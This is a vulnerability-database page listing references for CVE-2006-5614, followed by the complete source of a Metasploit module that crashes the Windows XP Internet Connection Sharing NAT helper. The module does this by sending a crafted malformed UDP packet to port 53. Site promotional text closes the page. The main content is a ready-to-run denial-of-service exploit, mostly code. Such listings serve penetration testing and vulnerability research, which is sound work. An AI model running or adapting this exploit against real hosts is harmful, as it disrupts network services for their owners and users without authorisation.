| Reporter | Title | Published | Views | Family All 6 |
|---|---|---|---|---|
| CVE-2006-5614 | 29 May 201815:50 | – | circl | |
| Preemptive Protection against Microsoft Windows 'ipnathlp.dll' Denial of Service Vulnerability | 14 Nov 200600:00 | – | checkpoint_advisories | |
| CVE-2006-5614 | 31 Oct 200601:00 | – | cve | |
| CVE-2006-5614 | 31 Oct 200601:00 | – | cvelist | |
| Microsoft Windows NAT Helper Denial of Service | 8 Dec 200615:25 | – | metasploit | |
| CVE-2006-5614 | 31 Oct 200601:07 | – | nvd |
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Windows NAT Helper Denial of Service',
'Description' => %q{
This module exploits a denial of service vulnerability
within the Internet Connection Sharing service in
Windows XP.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '30096'],
[ 'BID', '20804' ],
[ 'CVE', '2006-5614' ],
],
'DisclosureDate' => '2006-10-26'))
register_options([Opt::RPORT(53),])
end
def run
connect_udp
pkt = "\x6c\xb6\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
pkt << "\x03" + Rex::Text.rand_text_english(3) + "\x06"
pkt << Rex::Text.rand_text_english(10) + "\x03"
pkt << Rex::Text.rand_text_english(3)
pkt << "\x00\x00\x01\x00\x01"
print_status("Sending dos packet...")
udp_sock.put(pkt)
disconnect_udp
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation